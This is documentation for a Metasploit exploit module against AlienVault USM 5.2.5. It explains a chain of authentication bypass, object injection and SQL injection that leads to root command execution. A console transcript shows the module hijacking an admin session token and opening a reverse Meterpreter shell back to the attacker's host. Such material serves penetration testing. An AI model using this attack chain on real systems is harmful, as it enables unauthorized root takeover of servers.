## Vulnerable Application

This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. Unauthenticated users can execute arbitrary commands under the context of the root user.

By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
action and policy that enables to execute operating system commands by using captured session token. As a final step,
SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
operating system command with root user privileges.

This module was tested against AlienVault USM 5.2.5.

**Vulnerable Application Installation Steps**

Major version of older releases can be found at following URL.
[http://downloads.eu.alienvault.com/c/download](http://downloads.eu.alienvault.com/c/download)

You can download file named as AlienVault-USM_trial_5.2.5.zip which contains a OVA file.
In order to complete installation phase, you have to apply [https://www.alienvault.com/try-it-free](https://www.alienvault.com/try-it-free) .
Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail address.

## Verification Steps

A successful check of the exploit will look like this:

```
msf > use exploit/linux/http/alienvault_exec 
msf exploit(alienvault_exec) > set RHOST 12.0.0.137
RHOST => 12.0.0.137
msf exploit(alienvault_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(alienvault_exec) > check
[+] 12.0.0.137:443 The target is vulnerable.
msf exploit(alienvault_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4445 
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=2gbhp8j5f2af0vu5es5t3083q4
[*] Creating rogue action
[+] Action created: aWbhnZFHqYbUbNW
[*] Retrieving rogue action id
[+] Corresponding Action ID found: D62A1D4A6D3AEEA65F99B606B02197A1
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5E22D6A9E79211E6B8E4000C29F647D7
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: ASdKHQOZVONGzfU
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be triggered..!
[*] Sending stage (38500 bytes) to 12.0.0.137
[*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300

meterpreter > getuid
Server username: root
meterpreter >
```
